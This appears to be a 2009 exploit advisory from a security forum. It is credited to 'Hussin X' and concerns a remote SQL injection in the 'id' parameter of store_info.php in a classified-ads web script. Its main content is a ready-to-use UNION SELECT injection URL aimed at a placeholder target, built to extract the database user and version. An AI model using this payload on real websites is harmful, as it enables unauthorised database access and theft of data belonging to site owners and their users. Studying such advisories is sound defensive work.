Classified Ads Scrip store_info.php id Remote SQL Injection Vulnerability.pdf

1 |___________________________________________________ 2 | 3 | Classified Ads Scrip ( store_info.php id) Remote SQL Injection Vulnerability 4 | 5 |___________________________________________________ 6 |−−−−−−−−−−−−−−−−−−−− Hussin X −−−−−−−−−−−−−−−−−−− 7 | 8 | Author: Hussin X 9 | 10 | Home : WwW.IQ−ty.CoM<http://WwW.IQ−ty.CoM> 11 | 12 | email: darkangel_g85[at]Yahoo[DoT]com 13 | 14 |___________________________________________________ 15 | 16 | script : http://www.pozscripts.com/product_details.php?item_id=5 17 | 18 | DorK : :) 19 |___________________________________________________ 20 21 Exploit: 22 ________ 23 24 25 26 www.[target].com/Script/store_info.php?id=−9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user(),0x3e,v ersion()),18,19,20,21,22,23−− 27 28 29 30 IQ−SecuritY FoRuM 31 Page 1/1 Classified Ads Scrip store_info.php id Remote SQL Injection Vulnerability Hussin X 12/31/2009